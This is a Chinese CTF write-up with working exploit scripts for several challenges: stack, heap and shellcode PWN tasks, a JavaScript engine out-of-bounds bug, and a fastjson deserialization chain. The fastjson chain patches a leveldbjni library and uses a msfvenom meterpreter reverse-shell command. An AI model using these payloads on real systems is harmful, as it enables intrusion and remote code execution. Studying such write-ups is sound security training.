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PWN --- ### Find\_Flag 分析find\_flag程序,存在的漏洞位于sub\_132F函数中,该函数中,存在栈溢出漏洞,如下所示: ```php .text:000000000000132F sub_132F proc near ; CODE XREF: main+71↓p .text:000000000000132F; __unwind { .text:000000000000132F endbr64 .text:0000000000001333 push rbp .text:0000000000001334 mov rbp, rsp .text:0000000000001337sub rsp, 60h .text:000000000000133B mov rax, fs:28h .text:0000000000001344 mov [rbp-8], rax .text:0000000000001348 xor eax, eax .text:000000000000134A lea rdi, aHiWhatSYourNam ; "Hi! What's your name? " .text:0000000000001351 mov eax, 0 .text:0000000000001356 call sub_1100 .text:000000000000135B lea rax, [rbp-60h] .text:000000000000135F mov rdi, rax .text:0000000000001362 mov eax, 0 .text:0000000000001367 call sub_1110 ; gets读入数据,未限制大小 .text:000000000000136C lea rdi, aNiceToMeetYou ; "Nice to meet you, " .text:0000000000001373 mov eax, 0 .text:0000000000001378 call sub_1100 .text:000000000000137D lea rax, [rbp-60h] .text:0000000000001381 mov rcx, 0FFFFFFFFFFFFFFFFh .text:0000000000001388 mov rdx, rax .text:000000000000138B mov eax, 0 .text:0000000000001390 mov rdi, rdx .text:0000000000001393 repne scasb .text:0000000000001395 mov rax, rcx .text:0000000000001398not rax .text:000000000000139B lea rdx, [rax-1] .text:000000000000139F lea rax, [rbp-60h] .text:00000000000013A3 add rax, rdx .text:00000000000013A6 mov word ptr [rax], 0A21h .text:00000000000013AB mov byte ptr [rax+2], 0 .text:00000000000013AF lea rax, [rbp-60h] .text:00000000000013B3 mov rdi, rax .text:00000000000013B6 mov eax, 0 .text:00000000000013BB call sub_1100 .text:00000000000013C0 lea rdi, aAnythingElse ; "Anything else? " .text:00000000000013C7 mov eax, 0 .text:00000000000013CC call sub_1100 .text:00000000000013D1 lea rax, [rbp-40h] .text:00000000000013D5 mov rdi, rax .text:00000000000013D8 mov eax, 0 .text:00000000000013DD call sub_1110 ; gets读入数据,未限制大小 .text:00000000000013E2 nop .text:00000000000013E3 mov rax, [rbp-8] .text:00000000000013E7 xor rax, fs:28h .text:00000000000013F0 jz short locret_13F7 .text:00000000000013F2 call sub_10D0 .text:00000000000013F7 .text:00000000000013F7 locret_13F7: ; CODE XREF: sub_132F+C1↑j .text:00000000000013F7 leave .text:00000000000013F8 retn .text:00000000000013F8; } // starts at 132F .text:00000000000013F8 sub_132F endp ``` 利用代码如下所示: ```php from pwn import* importstruct fs = "%17$lx,%19$lx" flag = 0x0000000000001231 ret_offset = 0x146f p = remote('', 20701) #p = process('./canary') print((p.recvuntil('name? ')).decode()) p.sendline(fs.encode()) buf = (p.recvuntil('!\n').decode()) print(buf) data = buf.split()[4].split('!')[0] canary = (int((data.split(',')[0]), 16)) ret = (int((data.split(',')[1]), 16)) print(canary) print(ret) print(p.recvuntil('? ').decode()) payload = (("A"*56).encode()) payload += struct.pack("<Q", canary) payload += (("A"*8).encode()) payload += struct.pack("<Q", flag + ret - ret_offset) p.sendline(payload) p.interactive() ``` ### WriteBook 利用代码如下所示: ```php #!/usr/bin/env python3 # -*- coding: utf-8 -*- from pwn import* exe = context.binary = ELF('./writebook') if args.LIBC: libc_path = "./libc.so.6" os.environ['LD_PRELOAD'] = libc_path else: libc_path = "/lib/x86_64-linux-gnu/libc.so.6" libc = ELF(libc_path) def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.GDB: context.terminal = ['tmux','splitw','-h'] return gdb.debug([exe.path] + argv) elif args.REMOTE: return remote("", "8892") else: return process([exe.path] + argv, *a, **kw) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: amd64-64-little # RELRO: Full RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled """ size: 32 [+] Heap-Analysis- __libc_malloc(32)=0x555555757040 page #1 1.New page 2.Write paper 3.Read paper 4.Destroy the page 5.Repick > 3 """ HEAP_BASE = 0 LIBC_BASE = 0 def create_page(size): io.sendline("1") io.recvuntil("both sides?") if240< size: io.sendline("2") else: io.sendline("1") io.sendline(str(size)) def remove_page(nr): io.sendline("4") io.recvuntil("Page:") io.sendline(str(nr)) def print_page(nr): io.sendline("3") io.recvuntil("Page:") io.sendline(str(nr)) def load_page(nr, data): io.sendline("2") io.recvuntil("Page:") io.sendline(str(nr)) io.recvuntil("Content:") io.send(data) def get_heapleak(pg_nr): global HEAP_BASE print_page(pg_nr) io.recvuntil("Content:") leakstr = io.recvline()[1:-1] + b"\x00\x00" print(hex(u64(leakstr))) heap_leak = u64(leakstr) HEAP_BASE = heap_leak - 0xd30 print("-"* 89) print("HEAPBASE: %s"% hex(HEAP_BASE)) def get_libcleak(pg_nr): global LIBC_BASE print_page(pg_nr) io.recvuntil("Content:") leakstr = io.recvline()[1:-1] + b"\x00\x00" print(hex(u64(leakstr))) libc_leak = u64(leakstr) LIBC_BASE = libc_leak - 0x3ec070 print("-"* 89) print("LIBC_BASE: %s"%hex(LIBC_BASE)) io = start() io.recvuntil("> ") # shellcode = asm(shellcraft.sh()) length = 0xf0-8 biglength = 0xf0 print("[*]First Create") create_page(0x1e0) #load_page(0, cyclic(0x1e0)) payload = b"A"*8 payload += p64(0x331) load_page(0, payload) io.sendline() create_page(0x40) create_page(0x50) create_page(0x60) create_page(40) create_page(0x1e0) create_page(0x90) create_page(0xf0) create_page(0xf0) create_page(0xf0) create_page(0xf0) create_page(0xf0) create_page(0xf0) create_page(0xf0) print("[*]Remove last 7") remove_page(7) remove_page(8) remove_page(9) remove_page(10) remove_page(11) remove_page(12) remove_page(13) print("[*]Create 0xf0") create_page(0xf0) print("[*]Heap Leak") get_heapleak(7) print("[*]Remove last") remove_page(7) #7 create_page(0x1e0) create_page(0x1e0) create_page(0x1e0) create_page(0x1e0) create_page(0x1e0) create_page(0x1e0) create_page(0x1e0) create_page(0x1e0) create_page(0x1e0) create_page(0x1e0) #keep from merging with top remove_page(7) remove_page(8) remove_page(9) remove_page(10) remove_page(11) remove_page(12) remove_page(13) remove_page(14) remove_page(15) create_page(0x1d0) get_libcleak(7) remove_page(7) print("LIBC_BASE: %s"%hex(LIBC_BASE)) print("HEAP_BASE: %s"%hex(HEAP_BASE)) payload = b"-"*(0x100-8) payload += p64(0xf1) load_page(5, payload) io.sendline() #tcache is now full for 0x1e0, overflow the next chunk header and set prev size CHUNK_TO_COALESCE = HEAP_BASE+0x260 FAKECHUNK_BASE = CHUNK_TO_COALESCE+0x18 FREE_HOOK = LIBC_BASE+0x3ed8e8 payload = b"" payload += b"A"*32 payload += p64(0x330) #fake prev_size pointing to page 0 load_page(4, payload) payload = b"A"*8 payload += p64(0x331) payload += p64(FAKECHUNK_BASE) payload += p64(FAKECHUNK_BASE+0x8) payload += p64(0x0) payload += p64(0x0) payload += p64(CHUNK_TO_COALESCE) len(payload) load_page(0, payload) io.sendline() #io.interactive() # free the page we modified the chunk on remove_page(5) # we now have unsorted bin pointing to 0x270 offset which overlaps. Now create a page to get that pointer create_page(0x1d0) create_page(0x1d0) create_page(0x1d0) # then remove to get into tcache remove_page(5) remove_page(6) remove_page(7) remove_page(8) # 0x270 offset pointer is now in tcache # overwrite the next pointer payload = b"" payload += p64(0) payload += p64(0x1e1) payload += p64(FREE_HOOK) load_page(0, payload) io.sendline() create_page(0x1d0) create_page(0x1d0) # Write the magic gadget to __free_hook ptr payload = p64(LIBC_BASE+0x4f432) load_page(6, payload) io.sendline() # free a page remove_page(3) io.interactive() """ 0x4f432 execve("/bin/sh", rsp+0x40, environ) constraints: [rsp+0x40] == NULL """ ``` ### CreateCode 反编译create\_code,漏洞点见如下代码注释处: ```php .text:00000000000013F0 sub_13F0 proc near ; CODE XREF: main+AE↓p .text:00000000000013F0; __unwind { .text:00000000000013F0 endbr64 .text:00000000000013F4 push rbp .text:00000000000013F5 mov rbp, rsp .text:00000000000013F8sub rsp, 10h .text:00000000000013FC mov dword ptr [rbp-0Ch], 0 .text:0000000000001403 mov eax, cs:dword_4040 .text:0000000000001409 cmp eax, 2Eh; '.' .text:000000000000140C jle short loc_142E .text:000000000000140E mov edx, 0Fh .text:0000000000001413 lea rsi, aNoMoreData ; "no more data.\n" .text:000000000000141A mov edi, 1 .text:000000000000141F mov eax, 0 .text:0000000000001424 call sub_10C0 .text:0000000000001429 jmp locret_153C .text:000000000000142E; --------------------------------------------------------------------------- .text:000000000000142E .text:000000000000142E loc_142E: ; CODE XREF: sub_13F0+1C↑j .text:000000000000142E mov eax, cs:dword_4040 .text:0000000000001434 add eax, 1 .text:0000000000001437 mov cs:dword_4040, eax .text:000000000000143D mov edi, 324h .text:0000000000001442 call sub_10F0 ; 申请1000字节大小的内存 .text:0000000000001447 mov [rbp-8], rax .text:000000000000144B mov rax, [rbp-8] .text:000000000000144Fand rax, 0FFFFFFFFFFFFF000h .text:0000000000001455 mov edx, 7 .text:000000000000145A mov esi, 1000h .text:000000000000145F mov rdi, rax .text:0000000000001462 call sub_1100 ; 设置申请的内存属性为RWX .text:0000000000001467 mov edx, 9 .text:000000000000146C lea rsi, aContent ; "content: " .text:0000000000001473 mov edi, 1 .text:0000000000001478 mov eax, 0 .text:000000000000147D call sub_10C0 .text:0000000000001482 mov rax, [rbp-8] .text:0000000000001486 mov edx, 3E8h .text:000000000000148B mov rsi, rax .text:000000000000148E mov edi, 0 .text:0000000000001493 mov eax, 0 .text:0000000000001498 call sub_10E0 ; 读取数据到内存中 .text:000000000000149D mov eax, cs:dword_4040 .text:00000000000014A3 cdqe .text:00000000000014A5 lea rcx, ds:0[rax*8] .text:00000000000014AD lea rdx, unk_4060 .text:00000000000014B4 mov rax, [rbp-8] .text:00000000000014B8 mov [rcx+rdx], rax .text:00000000000014BC mov rax, [rbp-8] .text:00000000000014C0 mov eax, [rax] .text:00000000000014C2 cmp eax, 0F012F012h; 判断起始地址是否为0xF012F012 .text:00000000000014C7 jnz short loc_1517 .text:00000000000014C9 jmp short loc_14EF .text:00000000000014CB; --------------------------------------------------------------------------- .text:00000000000014CB .text:00000000000014CB loc_14CB: ; CODE XREF: sub_13F0+106↓j .text:00000000000014CB mov rdx, [rbp-8] .text:00000000000014CF mov eax, [rbp-0Ch] .text:00000000000014D2 cdqe .text:00000000000014D4 movzx eax, byte ptr [rdx+rax+4] .text:00000000000014D9 cmp al, 0Fh; 判断数据值是否>0xF .text:00000000000014DB jbe short loc_14EB .text:00000000000014DD mov rdx, [rbp-8] .text:00000000000014E1 mov eax, [rbp-0Ch] .text:00000000000014E4 cdqe .text:00000000000014E6 mov byte ptr [rdx+rax+4], 0; 大于0xF,则置0 .text:00000000000014EB .text:00000000000014EB loc_14EB: ; CODE XREF: sub_13F0+EB↑j .text:00000000000014EB add dword ptr [rbp-0Ch], 1 .text:00000000000014EF .text:00000000000014EF loc_14EF: ; CODE XREF: sub_13F0+D9↑j .text:00000000000014EF cmp dword ptr [rbp-0Ch], 3E7h遍历内存中的数据 .text:00000000000014F6 jle short loc_14CB .text:00000000000014F8 mov rax, [rbp-8] .text:00000000000014FC add rax, 4 .text:0000000000001500 mov cs:qword_4048, rax .text:0000000000001507 mov rdx, cs:qword_4048 .text:000000000000150E mov eax, 0 .text:0000000000001513 call rdx ; qword_4048 ; 执行申请内存处的代码 .text:0000000000001515 jmp short loc_1521 .text:0000000000001517; --------------------------------------------------------------------------- .text:0000000000001517 .text:0000000000001517 loc_1517: ; CODE XREF: sub_13F0+D7↑j .text:0000000000001517 mov rax, [rbp-8] .text:000000000000151B mov dword ptr [rax], 4 .text:0000000000001521 .text:0000000000001521 loc_1521: ; CODE XREF: sub_13F0+125↑j .text:0000000000001521 mov edx, 15h .text:0000000000001526 lea rsi, aCreateSuccessf ; "create successfully.\n" .text:000000000000152D mov edi, 1 .text:0000000000001532 mov eax, 0 .text:0000000000001537 call sub_10C0 .text:000000000000153C .text:000000000000153C locret_153C: ; CODE XREF: sub_13F0+39↑j .text:000000000000153C leave .text:000000000000153D retn .text:000000000000153D; } // starts at 13F0 .text:000000000000153D sub_13F0 endp ``` 通过上述分析,可以知道,申请了1000字节RWX内存,当前四字节内容为0xF012F012时,会为进一步判断后续内存数据,数据内容限定在0~0xF之间,后续直接执行此处代码。因而,这里可以使用如下指令进行构造,exp如下: ```php from pwn import* context(os='linux', arch='amd64') #context.log_level = 'debug' BINARY = './create_code' elf = ELF(BINARY) if len(sys.argv) > 1and sys.argv[1] == 'r': HOST = "" PORT = 8888 s = remote(HOST, PORT) else: s = process(BINARY) #context.terminal = ['tmux', 'splitw', '-h'] #s = gdb.debug(BINARY) s.sendline('1') print(s.recvuntil("content: ")) flag = b"\x12\xF0\x12\xF0" buf = asm(''' add DWORD PTR [rip+0x600], eax ''') # make xor ecx,ecx code 0x31c9 buf += asm(''' add al, 0x0d add al, 0x0d add al, 0x0d add BYTE PTR [rdx+rax*1], al add al, 0x01 add BYTE PTR [rdx+rax*1], al add BYTE PTR [rdx+rax*1], al add BYTE PTR [rdx+rax*1], al add BYTE PTR [rdx+rax*1], al add BYTE PTR [rdx+rax*1], al ''') # padding buf += asm(''' add cl, BYTE PTR [rdx] add cl, BYTE PTR [rdx] add cl, BYTE PTR [rdx+rax*1] ''') buf += b"\x00"*(0x27-len(buf)) buf += b"\x0a\x01" # rcx = 0x200 buf += asm(''' add ecx, DWORD PTR [rip+0x30f] ''') # push rdx # 0x52 buf += asm(''' add al, 1 add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al ''') # pop rdi # 0x5f buf += asm(''' add cl, byte PTR [rdx] add al, 6 add byte PTR [rdx+rcx*1], al add al, 1 add byte PTR [rdx+rcx*1], al ''') # al = 0x30 # add rdi, 0x30f # 4881c70f030000 buf += asm(''' add cl, byte PTR [rdx] add al, 0xf add al, 1 add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add cl, byte PTR [rdx] add cl, byte PTR [rdx] add cl, byte PTR [rdx] ''') # al = 0x40 # xor esi, esi # 0x31f6 buf += asm(''' add cl, byte PTR [rdx] add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al ''') # al = 0x30 # xor edx, edx # 0x31d2 buf += asm(''' add cl, byte PTR [rdx] add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add al, 1 add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al ''') # al = 0x31 # push 0x3b # 0x6a3b buf += asm(''' add cl, byte PTR [rdx] add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add byte PTR [rdx+rcx*1], al ''') # al = 0x31 # pop rax # 0x58 buf += asm(''' add cl, byte PTR [rdx] add al, 0xf add al, 0xf add al, 0x9 add byte PTR [rdx+rcx*1], al ''') # al = 0x58 # make /bin/sh # rcx = 0x200 buf += asm(''' add ecx, DWORD PTR [rip+0x20f] add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0xf add al, 0x5 add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add al, 2 add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add cl, byte PTR [rdx] add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al add byte PTR [rdx+rcx*1], al ''') # padding buf += asm(''' add cl, BYTE PTR [rdx] ''')*((0x200-len(buf))//2 - 1) buf += asm(''' add cl, byte PTR [rdx+rax*1] ''') buf += b"\x00\x00\x08\x01\x07\x0f\x03\x00\x00\x01\x06\x01\x0e\x08\x0a\x00\x0f\x05" buf += b"\x00"*(0x2df-len(buf)) buf += b"\x00\x01"# rcx = 0x30f buf += b"\x00"*(0x30f-len(buf)) buf += b"\x0f\x02\x09\x0e\x0f\x0d\x02"# /bin/sh buf += b"\x00"*(0x30f+0x2f-len(buf)) buf += b"\x00\x02"# rcx = 0x200 buf += b"\x00"*(1000-len(buf)) s.sendline(flag+buf) s.interactive() ``` ### Hello\_Jerry 本题将 array.shift 进行了 patch ,每一次 shift 会将 length 减 2 ,那么当 length 为 1 的时候进行一次 shift 便可以得到一个 oob array ,之后便是常规的思路: ```php leak elf_base -> leak libc_base -> leak stack_base -> write ret_addr to one_gadget ``` 编辑exp.js。 ```php function printhex(s,u){ print(s,"0x"+ u[1].toString(16).padStart(8, '0') + u[0].toString(16).padStart(8, '0')); } function hex(i){ return"0x"+ i.toString(16).padStart(16, '0'); } function pack64(u){ return u[0] + u[1] * 0x100000000; } function l32(data){ let result = 0; for(let i=0;i<4;i++){ result <<= 8; result |= data & 0xff; data >>= 8; } return result; } a = [1.1]; a.shift(); var ab = newArrayBuffer(0x1337); var dv = newDataView(ab); var ab2 = newArrayBuffer(0x2338); var dv2 = newDataView(ab2); for(let i = 0; i < 0x90; i++){ dv2 = newDataView(ab2); } a[0x193] = 0xffff; print("[+]change ab range"); a[0x32] = 0xdead; for(let i = 0; i < 100000000; i ++){ } var idx = 0; for(let i = 0; i < 0x5000; i++){ let v = dv.getUint32(i, 1); if(v == 0x2338){ idx = i; } } print("Get idx!"); function arb_read(addr){ dv.setUint32(idx + 4, l32(addr[0])); dv.setUint32(idx + 8, l32(addr[1])); let result = newUint32Array(2); result[0] = dv2.getUint32(0, 1) result[1] = dv2.getUint32(4, 1); return result; } function arb_write(addr,val){ dv.setUint32(idx + 4, l32(addr[0])); dv.setUint32(idx + 8, l32(addr[1])); dv2.setUint32(0, l32(val[0])); dv2.setUint32(4, l32(val[1])); } var u = newUint32Array(2); u[0] = dv.getUint32(idx + 4, 1); u[1] = dv.getUint32(idx + 8, 1); print(hex(pack64(u))); var elf_base = newUint32Array(2); elf_base[0] = u[0] - 0x6f5e0; elf_base[1] = u[1]; printhex("elf_base:",elf_base); var free_got = newUint32Array(2); free_got[0] = elf_base[0] + 0x6bdd0; free_got[1] = elf_base[1]; printhex("free_got:",free_got); var libc_base = arb_read(free_got); libc_base[0] -= 0x9d850; printhex("libc_base:",libc_base); var environ_addr = newUint32Array(2); environ_addr[0] = libc_base[0] + 0x1ef2d0; environ_addr[1] = libc_base[1]; printhex("environ_addr:",environ_addr); var stack_addr = arb_read(environ_addr); printhex("stack_addr:",stack_addr); var one_gadget = newUint32Array(2); one_gadget[0] = (libc_base[0] + 0xe6c7e); one_gadget[1] = libc_base[1]; printhex("one_gadget:",one_gadget); stack_addr[0] -= 0x118; arb_write(stack_addr,one_gadget); var zero = newUint32Array(2); zero[0] = 0; zero[1] = 0; printhex("zero:",zero); stack_addr[0] -= 0x29; arb_write(stack_addr,zero); print("finish"); for(let i = 0; i < 100000000; i ++){ } ``` 编辑exp。 ```php #!/usr/bin/env python importstring from pwn import* from hashlib import sha256 context.log_level = "debug" dic = string.ascii_letters + string.digits DEBUG = 0 def solvePow(prefix,h): for a1 in dic: for a2 in dic: for a3 in dic: for a4 in dic: x = a1 + a2 + a3 + a4 proof = x + prefix.decode("utf-8") _hexdigest = sha256(proof.encode()).hexdigest() if _hexdigest == h.decode("utf-8"): return x r = remote("",9998) r.recvuntil("sha256(XXXX+") prefix = r.recvuntil(") == ", drop = True) h = r.recvuntil("\n", drop = True) result = solvePow(prefix,h) r.sendlineafter("Give me XXXX:",result) data = open("./exp.js","r").read() data = data.split("\n") for i in data: if i == "": continue r.sendlineafter("code> ",i) r.sendlineafter("code> ","EOF") r.interactive() ``` ### 还是你熟悉的fastjson吗 由代码可看到,依赖中使用了fastjson和`org.fusesource.leveldbjni`,通过这fastjosn进行反序列化,并结合leveldbjni进行rce。 找到参考文档: ```php https://i.blackhat.com/USA21/Wednesday-Handouts/US-21-Xing-How-I-Used-a-JSON.pdf ``` 以及skay小姐姐对上面议题的代码分析: ```php http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/ ``` **读取文件目录,获取so文件名。** 需要先访问一次/test接口生成数据库和so文件,再读取文件名。 ```php import requests import os import sys import re importstring #step1 #read /tmp/ directory to find so file host = "" def step1(): global host result = [] def getArrayData(ch): out= [] for c in result: out.append(str(ord(c))) out.append(str(ord(ch))) return','.join(out) def poc(ch): url = '/hello' jsonstr = '{"abc":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"jdk.nashorn.api.scripting.URLReader","url":"netdoc:///tmp/"},"charsetName":"utf-8","bufferSize":1024},"boms":[{"charsetName":"utf-8","bytes":[%s]}]},"address":{"$ref":"$.abc.BOM"}}' data = { 'data': jsonstr % getArrayData(ch) } proxy = {'http':''} proxy = {} rsp = requests.post(host+url, data=data, proxies=proxy) if"bytes"in rsp.text: returnTrue else: returnFalse whileTrue: for ch instring.printable+'\r\n': if poc(ch): result.append(ch) print('step1>', ''.join(result)) break step1() ``` ![在这里插入图片描述](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c329e354765c770d031af209f679c9a9c70ad6c4.watermark%2Ctype_zhjvawrzyw5zzmfsbgjhy2s%2Cshadow_50%2Ctext_q1netiba5rex5l-h5pyn5y2d6yem55uu5a6j5ywo5a6e6aqm5a6k%2Csize_17%2Ccolor_ffffff%2Ct_70%2Cg_se%2Cx_16%23pic_center) **二进制文件修改分析。** 通过议题ppt给出的shellcode注入位置,是在文件偏移`0x197b0`处。 ![在这里插入图片描述](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-ca2024053fcb1d3b19e46f98468fb0b56868c3a3.watermark%2Ctype_zhjvawrzyw5zzmfsbgjhy2s%2Cshadow_50%2Ctext_q1netiba5rex5l-h5pyn5y2d6yem55uu5a6j5ywo5a6e6aqm5a6k%2Csize_19%2Ccolor_ffffff%2Ct_70%2Cg_se%2Cx_16%23pic_center) 反汇编代码如下: ![在这里插入图片描述](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a93367853efd7f3a56b911edf9e3758889daac1f.webp%23pic_center) 然而这里的空间比较小,只能jump到另外的位置去,将shellcode放到空的代码区局,找起来不方便。 这里参考skay小姐姐的方法,放到如下图的函数中,将shellcode设置为反弹msf的shellcode。 ![在这里插入图片描述](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-1bd94063c80c4b46ae4ffea4f1d84d4734ad4853.watermark%2Ctype_zhjvawrzyw5zzmfsbgjhy2s%2Cshadow_50%2Ctext_q1netiba5rex5l-h5pyn5y2d6yem55uu5a6j5ywo5a6e6aqm5a6k%2Csize_19%2Ccolor_ffffff%2Ct_70%2Cg_se%2Cx_16%23pic_center) ![在这里插入图片描述](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-3a308a3dc0e7822642cfc09a78f26146f95a1744.watermark%2Ctype_zhjvawrzyw5zzmfsbgjhy2s%2Cshadow_50%2Ctext_q1netiba5rex5l-h5pyn5y2d6yem55uu5a6j5ywo5a6e6aqm5a6k%2Csize_19%2Ccolor_ffffff%2Ct_70%2Cg_se%2Cx_16%23pic_center) 生成shellcode ```php msfvenom -a x64 --platform Linux-p linux/x64/meterpreter/reverse_tcp LHOST= LPORT=4444> shellcode ``` 监听 ```php use exploit/multi/handler set PAYLOAD linux/x64/meterpreter/reverse_tcp exploit -j ``` **写文件。** 问题:测试时写文件,发现文件存在,则上传的文件为.bak结尾。 ![在这里插入图片描述](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-d2eb1879973d251ea47b8f58c1e74c306312faa0.watermark%2Ctype_zhjvawrzyw5zzmfsbgjhy2s%2Cshadow_50%2Ctext_q1netiba5rex5l-h5pyn5y2d6yem55uu5a6j5ywo5a6e6aqm5a6k%2Csize_19%2Ccolor_ffffff%2Ct_70%2Cg_se%2Cx_16%23pic_center) 但是代码中给了一段copy覆盖的代码,用来解决这个问题。 参考skay小姐姐的base64编码的方法: ```php http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/ ``` 接下来就是将修改后的so文件上传并替换了,文件名为通过第一步获取到的文件名。 上传后,再次访问/test接口,触发rce。 ![在这里插入图片描述](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-9a8dc1bd62adb764295a280450b9eb411c17b05a.watermark%2Ctype_zhjvawrzyw5zzmfsbgjhy2s%2Cshadow_50%2Ctext_q1netiba5rex5l-h5pyn5y2d6yem55uu5a6j5ywo5a6e6aqm5a6k%2Csize_19%2Ccolor_ffffff%2Ct_70%2Cg_se%2Cx_16%23pic_center) ![在这里插入图片描述](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e83cb3f18f58143ae8aa2e17e125f192f2e1ccca.webp%23pic_center) OK,读取之到此结束。
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